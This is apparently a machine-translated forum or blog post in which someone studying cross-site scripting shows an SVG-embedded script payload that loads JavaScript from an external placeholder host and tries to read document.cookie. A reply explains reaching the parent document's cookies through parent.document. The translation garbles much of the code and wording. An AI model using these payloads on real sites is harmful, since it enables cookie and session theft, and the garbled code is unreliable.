I'm studying XSS I knew that there is vulnerability about the HTML SVG object
The source is here
& lt; Svg xmlns: svg = "http://www.w3.org/2000/ Svg" xmlns = "http://www.w3.org/2000/svg" xmlns: xlink = "http: // www. W3.org/1999/xlink "version =" 1.0 "x =" 0 "y =" 0 "width =" 0 "height =" 0 "id =" xss "& gt; & Lt; Script type = "text / espos" xlink: href = "http://blahblahblah.com/~blah/xss/xss js" & gt; & Lt; / Script & gt; & Lt; / Svg & gt; I tried to do it in xss.js
Warning (document.cookie); But the value of the cookie was "undefined"
The SVG object is a document object, but it is different from the HTML document object.
Then, how do I get parental document objects for cookies?
Please help.
Thanks for reading.
is an interface and an interface, both of which are derived from a base interface that provide some common methods Does. Cookies are part of the HTMLDocument interface and therefore only HTML documents receive cookies.
If you are talking about a situation where & lt; Svg & gt; In an HTML document & lt; Object & gt; , & lt; Embed & gt; or & lt; Iframe & gt; tag then parent.document or top.document will receive the parent HTML document from a script in the SVG object, provided the SVG and HTML documents are on the same domain. . This works for me at least Firefox ...
simultaneously embedded SVG
& lt; Svg xmlns = "http://www.w3.org/2000/svg" & gt; & Lt; Rect x = "0" y = "0" width = "100%" height = "100%" fill = "blue" /> & Lt; Script & gt; Warning (parent.document); & Lt; / Script & gt; & Lt; / Svg & gt;
No comments:
Post a Comment